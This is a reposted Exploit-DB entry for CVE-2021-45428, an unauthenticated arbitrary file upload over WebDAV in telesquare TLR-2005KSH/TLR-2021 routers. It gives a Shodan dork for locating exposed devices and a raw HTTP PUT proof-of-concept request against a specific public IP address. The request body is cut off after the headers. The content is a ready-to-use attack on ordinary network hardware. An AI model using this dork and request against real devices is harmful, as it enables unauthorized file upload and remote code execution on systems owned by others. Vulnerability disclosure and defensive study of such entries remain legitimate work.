TLR-2005KSH – Arbitrary File Upload

• Exploit Database
• 14 阅读

• 作者： Ahmed Alroky
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50931/

• # Exploit Title: TLR-2005KSH - Arbitrary File Upload
  # Date: 2022-05-11
  # Shodan Dork: title:"Login to TLR-2021"
  # Exploit Author: Ahmed Alroky
  # Author Company : Aiactive
  # Version: 1.0.0
  # Vendor home page : http://telesquare.co.kr/
  # Authentication Required: No
  # Tested on: Windows
  # CVE: CVE-2021-45428
  
  # Vulnerability Description
  # Due to the Via WebDAV (Web Distributed Authoring and Versioning),
  # on the remote server,telesquare TLR-2021 allows unauthorized users to upload
  # any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
  # remote code execution as well.
  # Due to the WebDAV, it is possible to upload the arbitrary
  # file utilizing the PUT method.
  
  # Proof-of-Concept
  # Request
  
  
  PUT /l6f3jd6cbf.txt HTTP/1.1
  Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Connection: close
  Content-Length: 10